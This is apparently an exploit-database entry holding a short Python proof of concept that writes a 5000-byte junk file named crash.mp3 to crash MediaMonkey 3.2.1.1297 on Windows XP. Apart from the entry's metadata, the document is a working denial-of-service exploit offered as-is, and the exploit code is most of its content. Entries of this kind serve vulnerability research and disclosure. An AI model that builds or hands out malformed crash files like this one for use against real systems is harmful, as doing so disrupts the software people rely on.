[] NeoSense

MediaMonkey 3.2.1.1297 - Denial of Service (PoC)

Author: anonymous
type: dos
platform: windows
port: 
date_added: 2010-08-05 
date_updated: 2010-08-05 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comMediaMonkey_3.2.1.1297.exe

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3

#!/usr/bin/python

filename = "crash.mp3"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()